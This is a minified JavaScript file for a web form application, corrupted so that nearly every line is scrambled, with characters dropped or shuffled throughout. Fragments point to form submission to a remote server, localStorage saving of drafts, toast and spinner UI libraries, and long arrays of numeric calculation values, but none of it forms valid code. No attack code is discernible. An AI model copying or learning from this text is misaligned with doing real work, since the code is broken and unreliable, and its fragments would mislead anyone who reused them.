.etn([]}lei(ia)euns_rvre=.eetc,odoc;.etn([]}(},hs_rvre.hnaa,hs_rvre.hnto,hs_rvre}opooyespot=ucine{eun![],.rttp.etn=ucine{(hse}opooye_eFrtupreDie=ucine{fe&()frvrt0telnt;+)vrnet;fti.uprsn)eunnrtr ul,.rttp.raentnefnto()rtr e ();a =e ;==.EIEdfn(lcloae,ucin)rtr }:==.XOTmdl.xot=:hslcloaeh.alwno)$f.eilzOjc=ucine{a =}nti.eilzAry)rtr .ahnfnto({f-=ti.aeidxf\"l\")vrn(&ti.au?s.tl.elcSeilhrnEcd(hsvle:hsvle|\";[hsnm]([hsnm]ps|([hsnm][[hsnm])tti.ae.uhn)tti.ae=})t;a s=s|{;s.tl=ucin)rtr{hcIMI:ucin)vrewno.aiao.srgn,=.neO(MI )neidxf\"NTCR)rtr!-==&-==),hcIFlUIfnto({eun(1=dcmn.oainpooo.neO(fl:)}cekfrweSpottrgSse:ucin)rtr!ti.hcIMI(&ti.hcIFlUI)}sz:ucine{eunJO.tigf()lnt}rpaepcaCaAdnoefnto()rtr noeRCmoeterpae/\\]g\"\\\\)rpae/\\]g'\\'.elc([//,\\/)rpae/\\]g\"\\\".elc([f/,\\f)rpae/\\]g\"\\\".elc([r/,\\r)rpae/\\]g\"\\\"),eJoPgMt:ucin)vre{;eun$\"nu[d=l])ec(ucin)e$ti)at(nm\"]scuisrpaepcaCaAdnoe$ti)vl)},}})vrscsc|}scfrSbiMdl=ucin)vre{r_cosre:hts/saesrasetovre.o/co\"ulsbi_evr\"tp:/hr.pedhecnetrcmsbi/,r_umtmliomsre:\"bfr_nieomumtclbc:od0atrolnfrsbi_alakvi ,fe_flnfrsbi_alakvi ,eJoFrDt_alakvi }tfnto(,)$aa(cce!,rsDmi:0tp:GT,aaye\"et,ieu:e,r:s.omumtoueotosuleh_evrscesfnto()et}errfnto(,,)tn}),=ucinetn{.jx{ye\"OT,rsDmi:0cnetye\"plcto/sn hre=t-\"ulscfrSbiMdl.pin.r_umtsre,aaJO.tigf()scesfnto()te}errfnto(,,)n)}}rtr{alfnieletsbiTiFr:ucine{a =.xed!,s.omumtouegtsnomaa)scuisgtsnaeea);eunscuissz()16e)ntfnto()scfrSbiMdl.pin.fe_nieomumtclbc(sces,),ucine{s.omumtoueotosatrolnfrsbi_alak\"ro\"\"h umthsfie.Pes r umtigtefr fe hl.))!}sbiOcMliomfnto({ucinen{folnt>)vrion;oafrg.eIe(,ucinis{f!)vrlscuissz()a=,<95&<0(.uhon)rps()+nolnt>?()t):(})}ucint)vrt{;.om=;a =.xed!,,s.tl.eJoPgMt()nlfnto()fnto ()i(.eghl{a =[]lcloaermvIe(,ucinu{|(.pie01,==.egh&s.omumtoueotosatrofieomumtclbc&scfrSbiMdl.pin.fe_flnfrsbi_alak\"ucs\"t,s.lblfrSoaefrSoaepaealak-s\"eee)+lclnt>?()(=,=e ra,=e ra,()))}(),ucin)scfrSbiMdl.pin.fe_flnfrsbi_alak&s.omumtoueotosatrofieomumtclbc(err,tts}}a =e ra,=e ra,=s.tl.iescuisgtsnaeea),=,=,=e ra;oafrg.trt(ucinetn{.uht}fnto({a =.neO(ti_om\";>1&.piet1,.otfnto(,)vrnelnt,=.eghrtr .usrn(,)tsbtig8o},=.eghscGoa.omtrg.omtrgUdtClbc(,sbi\",()),eJoFrDt:od0cni:ucint{hsotosti.pin?.xed{,hsotost:.xed{,,)ti.eJoFrDt=hsotosgtsnomaaclbc}})vrscsc|}scFrSoaels=ucin)fnto ()vrtvi !=&ehswPoet(dNm\"?.bae\"okok,=od0=e&.aOnrpry\"flnSoepae)eofietrUdt:od0ovi !=&ehswPoet(clbc_feOfietr\"?.alakAtrflnSoevi ;eunlcloaecni(die:lcloaeIDXDBlcloaeLCLTRG]nm:,eso:,trNm:},soehsomfnto(,)lcloaesttm\"hsfr_,,),eDryil:ucinet{oafrg.eIe(dryfed_,ucinno{=|[,1=.neO()&ops()lcloaesttm\"it_ils\"ot)),hcIFedsit:ucinet{oafrg.eIe(dryfed_,ucinno{=|[;a =.neO()-;()),omtrgUdtClbc:,aeomsflnSbiISoaefnto()vrtscuissz(s.tl.eJoPgMt()t=s.tl.iee,>e?udfnd!=&o\"ro\"\"h omi agrta h aiu ieadcno esvd\":hsayceSvdomCutfnto()vrr\"sbi_\"t=&(=_umt\" +)fnto()lcloaesttmrefnto(,)t0&\"neie\"=n&(,sv\",udfnd!=&o\"ucs\"))()),etrTiFrDtFoSoaefnto()lcloaegttm\"hsfr_,ucintn{fnl!=&\"bet=tpo )o(a nnnhswPoet()&s.omidrbn(,[];(\"}}aycedahaeFr:ucine{r{oafrg.esfnto(,)i(.egh0frvro0onlnt;+)_==[]caA()&ucint{oafrg.eIe(,ucinno{(,))([]}}ac()},snGtaeFrson:ucine{oafrg.esfnto(,)vro0i(.egh0frvrr0rnlnt;+)_==[]caA()&+;()),snGtaeFrsesfnto()lcloaeky(ucintn{a =e ra;fnlnt>)o(a =;<.eghr+\"\"=nr.hrt0&ops([];()),snRmvSvdomye:ucinet{oafrg.eoetmefnto()\"neie\"=n&oafrg.esfnto(,)ntlnt-,dlt\"}}}ayceoelSvdom:ucine{hsayceSvdomKy(ucint{o(a ntntlnt-?oafrg.eoetmtn,ucine{)(oafrg.eoetmtn,ucine{)e)}}}a ;eungtntnefnto()rtr |(=(),}})Srn.rttp.trsih|Srn.rttp.trsihfnto(,)rtr =|0ti.neO(,)=t)fnto()e[jur\",ucine{eunfnto({ucintetn{eunp{yeSerrioCash)ioCasserrmsaeeotosvrienttet)fnto (,)rtr |(=()ge\"\"tcnanrd,.eghg(&(=(),)fnto (,,)rtr (tp:.noioCash)ioCassif,esg:,pinOerd:,il:}}ucinre{=}ucinietn{eunp{yeSscesioCash)ioCassscesmsaeeotosvrienttet)fnto (,,)rtr (tp:.ann,cnls:(.cnlse.ann,esg:,pinOerd:,il:}}ucinse{a =(;|nt,(,)|()fnto ()vroh)rtr |no,&0=e\"fcs,)lnt?odvt:odgcide(.egh&.eoe)}ucinlt{o(a =.hlrn)onlnt-;>0o-ueno)t}ucinutn{eun(t|!=(:ou\"t.egh&([.ieehd(drto:.ieuainesn:.ieaigcmlt:ucin)vt})!)fnto ()rtr =(<i/\".tr\"d,.otieI)adls(.oiinls)at(ai-ie,plt\".tr\"oe,aet)gapnT((.agt)gfnto ({euntpoims:0tatls:tat,otieI:tatcnanr,eu:1soMto:fdI\"soDrto:0,hwaig\"wn\"oSonvi ,ieehd\"aeu\"hdDrto:e,ieaig\"wn\"oHde:od0etneTmOt13ioCass{ro:taterr,no\"os-no,ucs:tatsces,ann:tatwrig}ioCas\"os-no,oiinls:tattprgt,ieu:e,ilCas\"os-il\"msaels:tatmsae,agt\"oy,lsHm:<utntp=bto\"&ie;/utn'nwsOTp!,rvnDpiae:1porsBr!}fnto ()b&()fnto ()fnto ()rtr!(:ou\"u.egh|?cerieu(.nevld,[.ieehd(drto:.ieuainesn:.ieaigcmlt:ucin)vu,.nidn&hde\"=_sae&.nidn)_sae\"idn,.nTm=e aem_}):od0fnto ({stmOt0|.xeddieu>)&lstieu(,.xeddieu)Smxieieprela(.xeddieu)ShdEa(e ae.eTm(+.aHdTm)fnto ({laTmotl,.iet=,.tp!,0[.hwehd(drto:.hwuainesn:.hwaig)fnto ({a =ShdEa(e ae.eTm()Smxieie10pwdhe\"\"}a =(,=.cnls|sioCasi(od0=totosvrie&seetn(,.pinOerd)\rctotosvrieioCas|)speetulcts{ftmsae=yrtr;=.esg}+,=(,0;a =ulue\"dv>)fe\"dv>)de\"dv>)pe\"dv>)bescoetl,=itraI:ulhdEanl,aHdTm:ul,=tatdwsae\"iil\"satienwDt,pin:,a:}rtr .cnls&uadls(.osCas.dCasc,.il&(.pedttte.dCassttels)uapn(),.esg&(.pedtmsae.dCassmsaels)uapn(),.lsBto&(.dCas\"os-ls-utn)at(rl\"\"utn)upeedb)sporsBr&padls(tatpors\",.rpn(),.ie)snwsOTpgpeedu:.pedu,[.hwehd(drto:.hwuainesn:.hwaigcmlt:.nhw},.ieu>&(=eTmotostmOt,.aHdTm=asFotstmOt,.iet=nwDt)gtie)SmxieiesporsBr&SitraI=eItra(,0),.oe(,)!.nlc&stpoims&uciko,.lsBto&b&.lc(ucine{.tprpgto?.tprpgto(:od0=ecneBbl&!!=.aclube&ecneBbl=0,(0},.nlc&ucikfnto({.nlc(,(},()sdbg&osl,}ucinh)rtr .xed{,(,.pin)fnto ()g|gn),.s\"vsbe)|ermv(,=ul0=gcide(.egh&grmv(,=od0)vrgbyw0S{ro:err,no\"no,ucs:sces,ann:wrig}_{la:,eoecerrtgtotie:,noootos{,usrb:,ucs:,eso:210,ann:}rtr }))(fnto\"=yefdfn&dfn.m?eiefnto(,)\"neie\"=yefmdl&mdl.xot?oueeprstrqie\"qey):idwtat=(idwjur))fnto()\"ucin=tpo eie&eieaddfn(\"qey]e:ojc\"=yefeprsmdl.xot=(eur(jur\")ejur)(ucine{f!.upr.os&.jxrnpr&wno.DmiRqet{a =^tp?\\\\/,=^e|ot/,=e eEp\"\"lcto.rtcl\"\";.jxrnpr(*tx tlxljo\"fnto(,,)i(.rsDmi&rayc&.etrtp)&.etrul&ots(.r){a =ulrtr{edfnto(,)vro\",=idtTp|\")tLwrae)snwXoaneus,^d$.etitmot&(.ieu=.ieu)sotmotfnto({(0,tmot),.nodfnto({a =CnetLnt:\"srsosTx.egh\"rnotn-ye +.otnTp,=cd:0,esg:sces}r{etsrsosTx}tyi(hm\"=a|tx\\hm/.etscnetye).tlsrsosTx;lei(jo\"=a|tx\"=a&\\jo/.etscnetye)r{.snepreSNsrsosTx)cthe{.oe50omsae\"aserr}lei(xl==|\"et!=&//m/.etscnetye)vrinwAtvXbet\"irsf.MDM)iayc!;r{.odM(.epneet}ac()ivi }f!|!.ouetlmn|igtlmnsyaNm(preerr)lnt)ho .oe50omsae\"aserr,IvldXL +.epneetrxli}ac()trwefnlynocd,.esg,,)}sopors=ucin)}soerrfnto({(0,err,tx:.epneet),.aa&o\"tig==.yeidt)idt:.aa(.aa)soe(.yerul,.edo}aotfnto({&saot)}}})fnto(,)\"bet=tpo xot?oueeprst)\"ucin=tpo eie&eieaddfn()eSinrt)(hsfnto({ucineet{a ,=ouetcetEeete|dv)frni )[]tn;eunofnto ()frvrt1nagmnslnt;>;+).pedhl(ruet[];eunefnto (,,,)vrr[oaiy,,~10e,,]ji(-)i.1no10aMt.a(-1e/*10i,)scsbtig0cidxf\"nmto\")tLwrae)us&-++-|\";eunfr|(.netue\"\"u\"efae ++{%oaiy\"a\"\"i\"{pct:++}+i.1+%oaiy1\"(+)10\"{pct:++}0%oaiy\"a\"},.sRlslnt)fr=)rfnto (,)vrnoresyei(=.hrt0.opeCs(+.lc()vi !=[]rtr ;o(=;<.egho+i(=[]tvi !=[]rtr }ucinret{o(a ntesyeoen|n=[]rtr }ucinie{o(a =;<ruet.eght+{a =ruet[]frvroi )od0=eo&([]no)rtr }ucinaet{eunsrn\"=yefeeetelnt]fnto ()ti.psie|}sdfut,)vrclu[wbi\"\"o\"\"s,O]f{,=lns1,egh7wdh5rdu:0sae1cres1clr\"00,pct:2,oae0drcin1sed1tal10fs2,Idx29casae\"pne\"tp\"0\"lf:5%,hdw!,wce:1psto:aslt\";fsdfut=}ispooye{pnfnto()ti.tp)vrnti,=.psine=(ul{lsNm:.lsNm};fri{oiinopsto,it:,Idxozne,etolf,o:.o},&tisrBfr(,.isCid|ul,.eAtiue\"oe,porsbr)nlnsinot)!)vras0l(.ie-)(-.ieto)2uofsfuosedd(-.pct)(*.ri/0)mfolns!ucine)s+frvrt0tolnst+aMt.a(-s(.ie-)m%*,.pct)noaiyitodrcinlao;.ieu=.l&eTmote~(e/)})rtr }so:ucin)vreti.lrtr &(laTmotti.ieu)eprnNd&eprnNd.eoehl()ti.lvi )ti}lnsfnto(,)fnto (,)rtr ((,psto:aslt\"wdhisae(.eghiwdh+p\"hih:.cl*.it+p\"bcgon:,oSao:,rnfrOii:lf\"tasom\"oae\"~(6/.ie*+.oae+dg rnlt(+.cl*.ais\"x0\"breRdu:icresisaeiwdh>)\"x}}o(a ,=,=ilns1*1idrcin/;<.ie;+)=((,psto:aslt\"tp1~isaeiwdh2+p\"tasomihacl\"rnlt3(,,):\"oaiyioaiyaiainc&(.pct,.ri,+*.ieto,.ie)\"\"1ised\" ierifnt\")isao&tlrs\"00,004x#0\",tp\"p\"),(,(,((.oo,)\" p ga000.)))rtr }oaiyfnto(,,)tecidoe.egh&ecidoe[]syeoaiyn})\"neie\"=yefdcmn)lfnto({a =(sye,tp:tx/s\")rtr (ouetgtlmnsyaNm(ha\"[]n,.he|nsyehe})vrmre\"ru\",bhvo:ul#eal#M)};om\"rnfr\"&majfnto({ucinntn{eune\"\"t'xls\"r:cea-irsf.o:m\"cas\"pnvl>,)ladue\"si-m\"\"eairul#eal#M))spooyelnsfnto(,)fnto ({eunrn\"ru\"{orsz:+ +,oroii:l\"\"-},wdhuhih:}}ucinsesc{(,(((,rtto:6/.ie*+dg,et~s)trn\"onrc\"{rsz:.onr},wdhlhih:.cl*.it,etosaeordu,o:osaeowdh>,itrc)n\"il,clraoclre,pct:.pct},(srk\"{pct:}))vrclosae(.eghowdh,=*.cl*,=(.it+.egh*.cl*+p\"dri){oiin\"boue,o:,etf)i(.hdwfrc1c=.ie;+)(,2\"rgdDIaernfr.irsf.lrpxlais2mksao=,hdwpct=3\";o(=;<olnsc+sc;eunted}spooyeoaiyfnto(,,,)vrrefrthl;=.hdw&.ie|0r&+<.hlNdslnt&(=.hlNdsto,=&rfrthl,rr&.isCid&(.pct=)}(:=(,aiain)rtr };a s=s|{;s.pne=ucin)fnto ()vrnt)oefn(.pn)rtr{tr:ucin)eat(dsbe\"\")eat(dt-odn\"\")nsi(,.pedne),tpfnto({.tp)$\"rl=porsbr])rmv(,.eoetr\"iald)ermvAt(dt-odn\"}}ucint)vre{ie:1lnt:,it:,ais5cres.,oae1,ieto:,oo:#f\"sed1tal2,hdw!,wce:1casae\",Idx29tp\"0\"lf:5%}rtr e pne()si(}ucinn)rt)$\"om)apn(<i d\"oasinr tl=zidx 00;ipa:bokpsto:boueiprat\"cas\"oa\" sa ls=si\"sye\"oiin bouedsly lc;o:;otm0rgt0lf:;it:4p;egt 0x odrrdu:2p;akrudclr 333;-ne:1mri:uo\"<sa><dv',.pn)$\"mdlpne si\".pedre)fnto ({&(.tp)rvi )$\"mdlpne\".eoe)vrrvi ;euncet:,hwoaSinrndsryoaSinro})$fnto({s.s_s!;a =(bd\".tr\"rwesoae)e&scscb=tu\"=)scuiscekfrweSpottrgSse(;a =ucine{a =(#om nu,etraslc\",=.itr\"hdeBPrn\",=.eilzOjc()$\"frciptceko\".a(ucin)oti.ae=hscekd\"n:of};a =]$ec((iptfl\",ucinet{a =()ondt(fls)AryiAryo|(=SNpreo)rrcna())frvrirlnt,=;<;+)[xlfli\"a=noeRCmoetra.d;eunvi !osbet&&(.ujc=.ujc.elc(%C%C/, ),}scfrSbiMdl.ofg{eJoFrDt_alakfnto({eunt!)};a ='scfrSbiMdl.hwflnCnomtoDao=ucin)$\"ofieom-aecnomto-oa\".oa(so\"}$\"tobrpnlrgt)peed\"<i d'flnfrssbi'cas'iee><utni=ofieom-umtbn ye'utn ls=bnbnofieom-umtbns' sa ls=ofieom-oo>/pn<pnOfieFrs/pn sa d'1 ls=bdebdeofieom-umt 0/pn /utn /i>)$\"frc)peed\")$\"frc)apn()vro\"okok\"vi !=s.PNM&scAPAElnt>&(=s.PNM.ooeCs()scGoa=s.lbl|}scGoa.omtrg=s.omtrgCasgtntne{baeoofietrUdt:ucinet{(#1)hm()$\"ofieom-umtcnomto-oa cnom)tx(+s.ilgOfieumtatone)e0((#flnfrssbi\".eoels(hdm\",(#flnfrssbi\".dCas\"hwe):$\"ofieom-umt)rmvCas\"hwe)$\"ofieom-umt)adls(hdm\"),alakAtrflnSoefnto(,)$\"ofieom-aecnomto-oa\".oa(hd\",err==&aett})wno.rg_eacocikvi ,idwatsvig!,idwrpbf=]scscb&scuiscekfrweSpottrgSse(&(idwoiircl_nlc=eacocikwno.eacocikfnto()oiircl_nlc&oiircl_nlc()elnt>&(idwatsvig|wno.uoaen=0stieu(ucin)i((#omaig)rmvCas\"iee)adls(som\",udfnd!=s.lblfrSoae{a =(1;s.lblfrSoaesoehsomefnto()stieu(ucin)$\"frsvn\".eoels(som\".dCas\"iee),0)wno.uoaen=1)}13)},s.s_s&s.lblfrSoaersoehsomaarmtrg(eacocik,s.lblfrSoaeayceSvdomCutfnto()e0((#flnfrssbi\".eoels(hdm\",(#flnfrssbi\".dCas\"hwe)$\"x\".tle)((#flnfrssbi\".eoels(som\",(#flnfrssbi\".dCas\"iee)$\"x\".tle))$\"ofieom-umtbn)cikfnto({s.pne.hwoaSinr)scfrSbiMdl.alfnielefnto({s.lblfrSoaeayceSvdomCutfnto()scSinrdsryoaSinr)vrtscDao.flnSbiDs;(#flnfrssbi-ofrainysbn)bto(rst)$\"ofieom-umtcnomto-oa mdlbd if\".tlt,(#flnfrssbi-ofrainmdl.ofr\".tlscDao.flnSbiCnim,(#flnfrssbi-ofrainysbn)so(,(#flnfrssbi-ofrainmdl.t-ik)hm(N\",(#flnfrssbi-ofrainmdl.t-ik)so(,(#flnfrssbi-ofrainmdl)mdl\"hw)),ucin)scSinrdsryoaSinr)$\"ofieom-umtsau-oa\".oa(so\"}},idwofieom_aecnomto_e_t_lc=ucine{s.lblfrSoaesvFrAOfieumtntrg((0),idwofieom_umtcnomto_e_t_lc=ucine{s.omumtoueclIOlnEs(ucin)$\"ofieom-umtcnomto-e-t\".utn\"odn\",(#flnfrssbi-ofrainmdl.no)tx(s.ilgOfieumtat,(#flnfrssbi-ofrainmdl.ofr\".et\" et)$\"ofieom-umtcnomto-oa bnln\".ie)scfrSbiMdl.umtneutFr(}fnto({(#flnfrssbi-ttsmdl)mdl\"hw)),(#nieomsbi-ttsmdl.oa-ilg.oa-otn,ofieom-umtsau-oa mdldao mdlcnet)o(cik,ucine{.tprpgto(,(hs.lss(.oa\".oa(hd\"},osrotos{lsBto:0dbg!,eetno:1porsBr!,oiinls:tattprgt,rvnDpiae:0ociknl,hwuain\"0\"hdDrto:10\"tmOt\"00,xeddieu:10\"soEsn:sig,ieaig\"ier,hwehd\"aen,ieehd\"aeu\"};*cl*vrarx26nwAry5;o(a i0i<;i+{r2CC[i=e ra()frvrj=;j1j+)arx26i]j]0}vrarx26nwAry5;o(a i0i<;i+{r2DD[i=e ra()frvrj=;j1j+)arx26i]j]0}vrarx26nwAry5;o(a i0i<;i+{r2HH[i=e ra()frvrj=;j1j+)arx26i]j]0}vrarx1C3nwAry1)frvri=;i1;i+{r2C22[i=e ra()frvrj=;j1j+)arx1C3i]j]0}vrarx1E3nwAry1)frvri=;i1;i+{r2E22[i=e ra()frvrj=;j1j+)arx1E3i]j]0}vrarx1G3nwAry1)frvri=;i1;i+{r2G22[i=e ra()frvrj=;j1j+)arx1G3i]j]0}vrrwx150nwAry50;o(a j0j<0;j+{o3AA0[j=\";a o3CC0=e ra(0)frvrj=;j50j+)rwx150j]\"}vrrwx150nwAry50;o(a j0j<0;j+{o3DD0[j=\";a o3EE0=e ra(0)frvrj=;j50j+)rwx150j]\"}vrrwx150nwAry50;o(a j0j<0;j+{o3FF0[j=\";a o3GG0=e ra(0)frvrj=;j50j+)rwx150j]\"}vrrwx150nwAry50;o(a j0j<0;j+{o3HH0[j=\";a o3II0=e ra(0)frvrj=;j50j+)rwx150j]\"}\rvrrwx150nwAry50;o(a j0j<0;j+{o3JJ0[j=\";a o3KK0=e ra(0)frvrj=;j50j+)rwx150j]\"}vrrwx150nwAry50;o(a j0j<0;j+{o3LL0[j=\";a em=e ra(;a em=e ra(e ra(r2C22,,,10,e ra(r2C22,,,,);a em=e ra(e ra(r2CC,,,,);a em=e ra(e ra(r2CC,,,,)nwAryarx260040)vrec6nwArynwAryarx1E3801,)nwAryarx1E30060)vrec7nwArynwAryarx1G31,,10,e ra(r2G22,,,,);a em=e ra(e ra(r2HH,,,,);ucincl(aa{r2HH[]0=aa'LW268]arx264[]dt[XE___';a 25dt[XE___1]arx263[]dt[XE___';r2CC[]0=aa'LW253]vrcK=aa'LW241';r2HH[]0=aa'LW248]arx262[]dt[XE___';a 23dt[XE___1]arx261[]dt[XE___';r2CC[]0=aa'LW233]vrcK=aa'LW221';r2HH[]0=aa'LW228]arx260[]dt[XE___';a 21=006)vrcD2(.15;r2G22[]0=0;a 21=00)vrcD3(.7)arx1G31[]()vrcB4(.5;\nvrcD4(.5;r2G22[]0=0;a 21=00)vrcD5(.9;r2G22[]0=0;r2G22[]0=0;r2G22[]0=0;r2G22[]0=0;r2C22[]0=0;r2E22[]0=0;a 22=02;a 22=02;a 22=008;a 22=008;r2G22[]0=0;a 22=00)vrcD3(.8;a 22=00)rwx1500=\")rwx1500=\"nx \";o3DD0[](\";o3EE0[](AeoI\";o3FF0[](\";o3GG0[](AeoII)rwx1500=\")rwx1500=\"nx V)rwx1500=\")rwx1500=\"nx \";o3LL0[](\";o3AA0[](Fia\";o3CC0[](A&27qoa)rwx1501=\"eui\";o3EE0[](A&27qoa)rwx1501=\"eui\";o3GG0[](A&27qoa)rwx1501=\"eui\";o3II0[](A&27qoa)rwx1501=\"eui\";o3KK0[](A&27qoa)rwx1501=\"eui\";o3AA0[]()rwx1502=00)rwx1502=0;o3EE0[](.4)rwx1502=0;o3GG0[](.6;o3HH0[]()rwx1502=005;o3JJ0[]()rwx1502=015;\nrwx1502=0;o3AA0[](8000)rwx1503=003;o3DD0[](90;o3EE0[](.7)rwx1503=54)rwx1503=012;o3HH0[](30;o3II0[](.9;o3JJ0[](10;o3KK0[](.8;o3LL0[](50;o3AA0[](6000)rwx1504=005;o3DD0[](36)rwx1504=01;o3FF0[](36)rwx1504=015;o3HH0[](74)rwx1504=012;o3JJ0[](22)rwx1504=015;o3LL0[](90;o3AA0[](2000)rwx1505=017;o3DD0[](20)rwx1505=012;o3FF0[](20)rwx1505=01)rwx1505=360;o3II0[](.4;o3JJ0[](98)rwx1505=025;o3LL0[](70)rwx1506=10000)rwx1506=013;o3DD0[](70)rwx1506=017;o3FF0[](50)rwx1506=02)rwx1506=154)rwx1506=02)rwx1506=138)rwx1506=02)rwx1506=610;o3AA0[](600.1;o3CC0[](.9;o3DD0[](700;o3EE0[](.)\r o3FF0[](200;o3GG0[](.3;o3HH0[](400;o3II0[](.3;o3JJ0[](200;o3KK0[](.0)rwx1507=500)vrcC=smeea(,,,em);a 27(ugnrl500ec2)arx1C30[]((27*cB2);r2E22[]0=((((cC)(r2HH[]0))(r2HH[]0))(r2HH[]0))(21))arx1C31[]((27*cB3);r2E22[]0=((((cC)(r2HH[]0))(r2HH[]0))(r2HH[]0))(21))arx1C32[]((((((r2CC[]0)(r2CC[]0))(.8)+(((arx262[]+arx263[])+arx264[])*03)))(21))((((((r2CC[]0)(r2CC[]0))(.8)+(((arx262[]+arx263[])+arx264[])*03)))(400)?(((((arx260[]+arx261[])*00))((((r2CC[]0)(r2CC[]0))(r2CC[]0))(.2))-200))(.))()))\r r2C22[]0=((((arx260[]+arx261[])*01))((((r2CC[]0)(r2CC[]0))(r2CC[]0))(.2))*cB5);a 21=cK)arx1C34[](((r2CC[]0)(r2HH[]0))(21))vrcD6(22;r2E22[]0=((arx261[]-arx261[])*cD6);a 21=cK)arx1C35[]((((r2CC[]0)(r2CC[]0))(r2CC[]0))(21))vrcD7(23;r2E22[]0=(((arx262[]+arx263[])+arx264[])*cD7);a 21=cK)arx1C36[]((((r2CC[]0)(r2CC[]0))(r2HH[]0))(21))vrcD8(24;r2E22[]0=(((arx260[]+arx261[])-arx261[])*cB8);r2C22[]0=(arx260[]*cB0);r2E22[]0=(arx260[]*cD0);a 22=((arx263[]>0)?02:0);r2G22[]0=(arx260[]*cF0);r2C22[]0=(arx260[]*cB1);r2E22[]0=(arx260[]*cD1);a 22=cK)arx1C31]0=(arx260[]*cB2);a 22=cK)arx1E31]0=(arx260[]*cD2);a 22=((arx263[]>0)?cK)())arx1G31]0=(arx260[]*cF2);r2C22[1[]((r2HH[]0)(22))\r r2E22[1[]((r2HH[]0)(22))arx1G31]0=(arx260[]*cF3);a 22=smeea(100ec5)arx260[]((sro(((((cC)(2(okpv_a(cC)rwx150049rwx150049))-vnlou3vvr(27,o3AA0,,9,o3DD0,,9)))(27)+((cC)(600))(((((27*vnrwx1506))-vnrwx1506))/cC))(.3))())))()(((((27*vnlou3vvr(27,o3AA0,,9,o3CC0,,9)))(2(okpv_a(cC)rwx150049rwx150049))/cC))(((27>3000)?((((cC)(2(o3CC0[]))(2(o3DD0[]))(27)*035):0)));r2DD[]0=(ierr(((((27*vnlou3vvr(27,o3AA0,,9,o3EE0,,9)))(2(okpv_a(cC)rwx150049rwx150049))/cC))(((27>3000)?((((cC)(2(o3EE0[]))(2(o3FF0[]))(27)*03))())))()(((((27*vnlou3vvr(27,o3AA0,,9,o3EE0,,9)))(2(okpv_a(cC)rwx150049rwx150049))/cC))(((27>3000)?((((cC)(2(o3EE0[]))(2(o3FF0[]))(27)*03))())))arx262[]((sro(((((cC)(2(okpv_a(cC)rwx150049rwx150049))-vnlou3vvr(27,o3AA0,,9,o3HH0,,9)))(27)+((cC)(600))(((((27*vnrwx1506))-vnrwx1506))/cC))(.3))())))()(((((27*vnlou3vvr(27,o3AA0,,9,o3GG0,,9)))(2(okpv_a(cC)rwx150049rwx150049))/cC))(((27>3000)?((((cC)(2(o3GG0[]))(2(o3HH0[]))(27)*035):0)));\narx263[]((sro(((((cC)(2(okpv_a(cC)rwx150049rwx150049))-vnlou3vvr(27,o3AA0,,9,o3JJ0,,9)))(27)+((cC)(600))(((((27*vnrwx1506))-vnrwx1506))/cC))(.))())))()(((((27*vnlou3vvr(27,o3AA0,,9,o3II0,,9)))(2(okpv_a(cC)rwx150049rwx150049))/cC))(((27>3000)?((((cC)(2(o3II0[]))(2(o3JJ0[]))(27)*04):0)));r2DD[]0=(ierr(((((27*vnlou3vvr(27,o3AA0,,9,o3KK0,,9)))(2(okpv_a(cC)rwx150049rwx150049))/cC))(((27>3000)?((((cC)(2(o3KK0[]))(2(o3LL0[]))(27)*025):0)))?0:((((cC)(2(okpv_a(cC)rwx150049rwx150049))-vnlou3vvr(27,o3AA0,,9,o3LL0,,9)))(27)+((cC)(600))(((((27*vnrwx1506))-vnrwx1506))/cC))(.3))())))vrtp=((((((((((((cC)(27)-arx1E30[])-arx1E31[])-arx1E34[])-arx1E35[])-arx1E36[])-arx1E38[])-arx1E39[])-arx1E31]0))(r2E22[1[])-200))(.))vrtp=0;a uct_u=ahmxMt.a(ubrNGTV_NIIYtp)tp)vrsmn3ct2arx1E32[](((((((((((((27-cH))(r2E22[]0))(r2E22[]0))(r2E22[]0))(r2E22[]0))(r2E22[]0))(r2E22[]0))(r2E22[]0))(r2E22[0[])-arx1E31]0))(21))(a(,uct_u,uct_n,em));\narx1E33[]((((((((((((27-cH))(r2E22[]0))(r2E22[]0))(r2E22[]0))(r2E22[]0))(r2E22[]0))(r2E22[]0))(r2E22[]0))(r2E22[0[])-arx1E31]0))(21))arx1G37[]((sro(smrdc(em))?0:smrdc(em));a 22=smeea(100ec6)vrcG4(ugnrl400ec7)vrcF9((sro((arx1G37[]/cC)))()((r2G22[]0)(27));aa'LW22_'=22;aa'LW22_'=22;aa'LW22_'=22;aa'LW22_'=r2G22[1[]dt[XE__35]arx1E31]0;aa'LW22_'=r2C22[1[]dt[XE__27]arx1G31]0;aa'LW22_'=22;aa'LW22_'=r2E22[0[]dt[XE__24]cD2dt[XE__23]arx1C31]0;aa'LW22_'=22;aa'LW22_'=r2E22[]0;aa'LW22_'=r2C22[]0;aa'LW22_'=r2G22[]0;aa'LW22_'=22;aa'LW22_'=r2E22[]0;aa'LW22_'=r2C22[]0;aa'LW21_'=r2G22[]0;aa'LW21_'=21;aa'LW21_'=r2E22[]0;aa'LW21_'=21;aa'LW21_'=r2C22[]0;aa'LW21_'=21;aa'LW21_'=r2E22[]0;aa'LW21_'=21;\ndt[XE__73]arx1C35[]dt[XE__72]cB7dt[XE__65]arx1E34[]dt[XE__64]cD6dt[XE__63]arx1C34[]dt[XE__62]cB6dt[XE__55]arx1E33[]dt[XE__53]arx1C33[]dt[XE__45]arx1E32[]dt[XE__43]arx1C32[]dt[XE__35]arx1E31[]dt[XE__33]arx1C31[]dt[XE__25]arx1E30[]dt[XE__23]arx1C30[]dt[XE___'=27dt[XE___'=27dt[XE___'=r2DD[]0;aa'LW254]arx263[]dt[XE___'=r2DD[]0;aa'LW234]arx261[]dt[XE___'=r2DD[]0;;*\r otta 337(tp/gtotta.o)\n*Cprgt21-06Titr n.\n*Lcne ne h I ies\r /\nf\"neie\"=yefjur)ho e ro(BosrpsJvSrp eursjur\";fnto()\"s tit;a =.njur.pi( )0.pi(.)i([]2&[]9|=b0&9=[]&[]1|[]3trwnwErr\"otta' aacitrqie Qeyvrin191o ihr u oe hnvrin4)(Qey,fnto()\"s tit;ucinb)vradcmn.raelmn(bosrp)b{ektrniin\"ektrniinn\"Mzrniin\"rniinn\"Orniin\"TastoEdorniinn\"tasto:tastoed}frvrci )fvi !=.tl[]rtr{n:[];eun1af.mltTastoEdfnto()vrc!,=hsati)oe\"srniinn\"fnto({=0)vrefnto({|ad.rge(.upr.rniined}rtr eTmoteb,hs,(ucin)aspottasto=(,.upr.rniin&aeetseilbTastoEd{idyeaspottasto.n,eeaeyeaspottasto.n,adefnto()i((.agt.sti)rtr .adeb.ade.pl(hsagmns}))(Qey,fnto()\"s 